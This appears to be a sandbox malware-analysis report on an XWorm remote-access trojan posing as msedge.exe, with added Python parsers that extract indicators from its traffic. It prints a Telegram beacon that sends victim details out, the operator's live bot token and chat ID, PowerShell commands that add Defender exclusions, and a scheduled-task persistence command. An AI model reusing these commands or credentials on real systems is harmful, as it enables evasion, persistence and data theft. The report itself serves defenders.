                                          Aug 3, 2024 20:11:43.723237991 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.683209896 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.726345062 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:48.733797073 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:48.738781929 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738818884 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738840103 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738850117 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738884926 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738907099 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738929987 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738940001 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.320488930 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:52.325517893 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.509901047 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.511794090 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:52.516581059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.694350958 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.734020948 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:53.739058971 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739073038 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739114046 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739123106 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739141941 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739151001 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739159107 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739170074 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:55.631124020 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:55.679455042 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.696171999 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.742053986 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.775505066 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.780500889 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780525923 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780541897 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780558109 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780575037 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780606031 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780626059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780642033 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.700018883 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.741991997 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:03.772721052 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:03.777565956 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777648926 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777658939 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777667999 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777678013 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777697086 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777705908 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777718067 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.758347034 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:06.763448954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.948812962 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.950680971 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:06.955787897 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.705779076 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.757608891 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:08.780375004 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:08.785461903 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785497904 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785511017 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785522938 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785537958 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785550117 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785569906 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785582066 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.743014097 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:12.747878075 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.990411997 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.991173029 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:12.996046066 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:13.700721979 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:13.741976976 CEST497227000192.168.2.6213.219.149.161
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2024 20:11:06.907565117 CEST | 59150 | 53 | 192.168.2.6 | 1.1.1.1
Aug 3, 2024 20:11:06.914482117 CEST | 53 | 59150 | 1.1.1.1 | 192.168.2.6
Aug 3, 2024 20:11:07.866734982 CEST | 59684 | 53 | 192.168.2.6 | 1.1.1.1
Aug 3, 2024 20:11:07.874283075 CEST | 53 | 59684 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 3, 2024 20:11:06.907565117 CEST | 192.168.2.6 | 1.1.1.1 | 0x5774 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Aug 3, 2024 20:11:07.866734982 CEST | 192.168.2.6 | 1.1.1.1 | 0xef65 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 3, 2024 20:11:06.914482117 CEST | 1.1.1.1 | 192.168.2.6 | 0x5774 | No error (0) | pastebin.com | - | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Aug 3, 2024 20:11:06.914482117 CEST | 1.1.1.1 | 192.168.2.6 | 0x5774 | No error (0) | pastebin.com | - | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Aug 3, 2024 20:11:06.914482117 CEST | 1.1.1.1 | 192.168.2.6 | 0x5774 | No error (0) | pastebin.com | - | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Aug 3, 2024 20:11:07.874283075 CEST | 1.1.1.1 | 192.168.2.6 | 0xef65 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• pastebin.com
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 104.20.3.235 | 443 | 3840 | C:\Users\user\Desktop\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-03 18:11:07 UTC | 74 | OUT | GET /raw/RPPi3ByL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
2024-08-03 18:11:07 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Sat, 03 Aug 2024 18:11:07 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 355
Last-Modified: Sat, 03 Aug 2024 18:05:12 GMT
Server: cloudflare
CF-RAY: 8ad844b4182e7cb1-EWR
2024-08-03 18:11:07 UTC | 26 | IN | Data Raw: 31 34 0d 0a 32 31 33 2e 32 31 39 2e 31 34 39 2e 31 36 31 3a 37 30 30 30 0d 0a
Data Ascii: 14\r\n213.219.149.161:7000\r\n  (chunk-size line 0x14 = 20 bytes, followed by the 20-byte chunk payload: the C2 address 213.219.149.161:7000, the same endpoint the TCP session on port 7000 above connects to)
2024-08-03 18:11:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0\r\n\r\n  (zero-length chunk terminating the chunked body)
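The paste is a dead-drop resolver: the sample fetches it and reads the C2 endpoint out of the chunked body. The decoder below is an added example, not code from the Joe Sandbox report or from XWorm; it reassembles HTTP/1.1 chunked transfer encoding from the exact bytes listed in session 0 and validates the recovered host:port, returning None for a truncated or non-conforming body (for instance the HTML page pastebin serves once a paste has been removed). The sample inputs other than SESSION0_BODY are constructed for the example.

```python
"""Decode the pastebin dead-drop response captured in session 0 above."""
import ipaddress
import re
from typing import Optional, Tuple

# Raw body bytes exactly as listed under "Data Raw" in session 0 (copied
# from the report, not constructed): a 0x14-byte chunk, then the 0 chunk.
SESSION0_BODY = bytes.fromhex(
    "31 34 0d 0a 32 31 33 2e 32 31 39 2e 31 34 39 2e 31 36 31 3a 37 30 30 30 0d 0a"
    "30 0d 0a 0d 0a"
)

# Plain DNS-style hostname; anything else (HTML, JSON, garbage) is rejected.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$")


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a chunked HTTP body; raise ValueError if it is truncated."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        # The size line is hex and may carry ";ext=value" chunk extensions.
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            # Optional trailer headers may follow; a blank line must end them.
            if body.find(b"\r\n", pos) < 0:
                raise ValueError("missing final CRLF after last chunk")
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk data")
        out += chunk
        pos += size + 2


def parse_c2(text: str) -> Tuple[str, int]:
    """Validate a 'host:port' dead-drop entry and return (host, port)."""
    host, sep, port_s = text.strip().rpartition(":")
    if not sep or not port_s.isdigit():
        raise ValueError("expected host:port, got %r" % text)
    port = int(port_s)
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %d" % port)
    try:
        host = str(ipaddress.ip_address(host))   # normalise a literal IP
    except ValueError:
        if not _HOST_RE.match(host):             # otherwise require a bare hostname
            raise ValueError("bad host %r" % host)
    return host, port


def extract_c2(body: bytes) -> Optional[Tuple[str, int]]:
    """Decode a chunked paste body; None if it is incomplete or not host:port."""
    try:
        return parse_c2(decode_chunked(body).decode("ascii"))
    except (ValueError, UnicodeDecodeError):
        return None


def c2_from_session0() -> Optional[Tuple[str, int]]:
    return extract_c2(SESSION0_BODY)


if __name__ == "__main__":
    print(c2_from_session0())
```

The decoded value is the destination of the long-lived port 7000 session in the packet table, so both the paste URL (/raw/RPPi3ByL) and the address are indicators; the paste URL is the more durable pivot, since the operator can edit the paste to move the C2 without touching the sample.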


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49721 | 149.154.167.220 | 443 | 3840 | C:\Users\user\Desktop\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-03 18:11:08 UTC | 448 | OUT | GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-08-03 18:11:08 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 03 Aug 2024 18:11:08 GMT
Content-Type: application/json
Content-Length: 463
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-08-03 18:11:08 UTC | 463 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 38 33 32 34 30 38 30 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 6f 74 69 66 79 46 6f 72 53 68 61 64 6f 77 43 72 79 70 74 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 6f 74 69 66 79 46 6f 72 53 68 61 64 6f 77 43 72 79 70 74 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 37 39 30 31 38 31 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 78 69 6d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 6b 70 6f 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 32 37 30 38 36 36
Data Ascii: {"ok":true,"result":{"message_id":193,"from":{"id":7483240807,"is_bot":true,"first_name":"NotifyForShadowCrypter","username":"NotifyForShadowCrypter_bot"},"chat":{"id":5279018187,"first_name":"Maxim","last_name":"Zekpot","type":"private"},"date":172270866
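Session 1 is the new-victim notification XWorm sends through the Telegram Bot API: the bot token sits in the URL path, the recipient chat and the victim summary sit in the query string, and the summary itself is a URL-encoded block of "Key : Value" lines. The parser below is an added example, not code from the report or from XWorm; it takes the request line exactly as captured above and turns it into structured identifiers, handling the one irregularity in the format (the "New Clinet" value is empty and the client ID is on the following line).

```python
"""Pull operator and victim identifiers out of the Telegram beacon in session 1."""
import re
from typing import Dict, Optional
from urllib.parse import parse_qs

# Request line copied verbatim from session 1 above (live data from the
# report, not a constructed sample).
SESSION1_REQUEST = (
    "GET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage"
    "?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet"
    "%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName"
    "%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error"
    "%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6"
    " HTTP/1.1"
)

# Bot API paths look like /bot<numeric id>:<token>/<method>.
_BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<api_method>\w+)$")
_VERSION = re.compile(r"\[(XWorm[^\]]*)\]")


def parse_notification(text: str) -> Dict[str, str]:
    """Turn the decoded 'Key : Value' lines of the beacon text into a dict.

    An empty value (XWorm writes 'New Clinet : ' and puts the client ID on the
    next line) is filled from the next non-blank line.
    """
    lines = text.splitlines()
    fields: Dict[str, str] = {}
    i = 0
    while i < len(lines):
        key, sep, value = lines[i].partition(" : ")
        i += 1
        if not sep:
            continue                      # banner line, blank line, etc.
        value = value.strip()
        while not value and i < len(lines):
            value = lines[i].strip()
            i += 1
        fields[key.strip()] = value
    return fields


def parse_beacon(request_line: str) -> dict:
    """Extract bot, chat and victim fields from a sendMessage request line."""
    method, target, _http_version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    m = _BOT_PATH.match(path)
    if not m:
        raise ValueError("not a Telegram bot API path: %r" % path)
    params = parse_qs(query)             # percent-decodes %0D%0A, %20, UTF-8 bytes
    text = params.get("text", [""])[0]
    vm = _VERSION.search(text)
    return {
        "method": method,
        "bot_id": m.group("bot_id"),
        "token": m.group("token"),
        "api_method": m.group("api_method"),
        "chat_id": params.get("chat_id", [None])[0],
        "version": vm.group(1) if vm else None,
        "fields": parse_notification(text),
    }


def session1_beacon() -> dict:
    return parse_beacon(SESSION1_REQUEST)


if __name__ == "__main__":
    b = session1_beacon()
    print(b["bot_id"], b["chat_id"], b["version"], b["fields"])
```

The bot id and chat id identify the operator side and survive a change of C2 address or paste, which makes them better hunting pivots than the IP from session 0; the "New Clinet" value is the per-victim ID the panel will use in later traffic.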


Target ID: 0
Start time: 14:10:05
Start date: 03/08/2024
Path: C:\Users\user\Desktop\msedge.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\msedge.exe"
Imagebase: 0x590000
File size: 170'496 bytes
MD5 hash: AEE20D80F94AE0885BB2CABADB78EFC9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation: low
Has exited: false

Target ID: 2
Start time: 14:10:08
Start date: 03/08/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 14:10:08
Start date: 03/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 14:10:15
Start date: 03/08/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 14:10:15
Start date: 03/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 14:10:26
Start date: 03/08/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\msedge.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 14:10:26
Start date: 03/08/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:14:10:42
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
                                          Imagebase:0x7ff6e3d50000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:14
                                          Start time:14:10:42
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:16
                                          Start time:14:11:05
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\schtasks.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0x7ff6cb8c0000
                                          File size:235'008 bytes
                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:17
                                          Start time:14:11:05
                                          Start date:03/08/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:18
                                          Start time:14:11:07
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\msedge.exe
                                          Imagebase:0x350000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 71%, ReversingLabs
                                          • Detection: 66%, Virustotal
                                          Has exited:true

                                          Target ID:19
                                          Start time:14:11:14
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0x3a0000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:14:11:23
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\AppData\Local\msedge.exe"
                                          Imagebase:0xb60000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:14:12:01
                                          Start date:03/08/2024
                                          Path:C:\Users\user\AppData\Local\msedge.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Local\msedge.exe
                                          Imagebase:0xdd0000
                                          File size:170'496 bytes
                                          MD5 hash:AEE20D80F94AE0885BB2CABADB78EFC9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:30.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 6044 7ffd34683bbd 6045 7ffd34683bef RtlSetProcessIsCritical 6044->6045 6047 7ffd34683ca2 6045->6047 6052 7ffd346837ca 6053 7ffd346843a0 SetWindowsHookExW 6052->6053 6055 7ffd34684451 6053->6055

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 9f449f46ec61e9d27b8401c0fae2f1ced459e7253002bba2714ca14977898dc7
                                            • Instruction ID: ccd209f01625ce5f6eb182a529d7ec2532bc7c5c196c9fee475e2cabe373b35e
                                            • Opcode Fuzzy Hash: 9f449f46ec61e9d27b8401c0fae2f1ced459e7253002bba2714ca14977898dc7
                                            • Instruction Fuzzy Hash: 32828230B1C91A4FEBA4FB6884B66B973D2FF9A301F544579D54ED32C2DE2CA8029741

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAM_^
                                            • API String ID: 0-3136481660
                                            • Opcode ID: 4d65bf0560fd0bdeb3e18eb46c18a956cc2318ba18217d07b71dc8a2a10fcf5b
                                            • Instruction ID: fabb30d89ac3afd619a9f93ce9e37a6360f2a9e0f45ad58c5fdf3a6c5f586351
                                            • Opcode Fuzzy Hash: 4d65bf0560fd0bdeb3e18eb46c18a956cc2318ba18217d07b71dc8a2a10fcf5b
                                            • Instruction Fuzzy Hash: E252B361B18B194FEBA4EBA884B57B977D2FF99300F540579E44EC32D2DE2CA8418741

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3385469580.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34680000_msedge.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: KL_L
                                            • API String ID: 0-1452816548
                                            • Opcode ID: d21cf00a55e69310f66aab8bebe1c94f377537ec06b319473ac5dbc34513089f
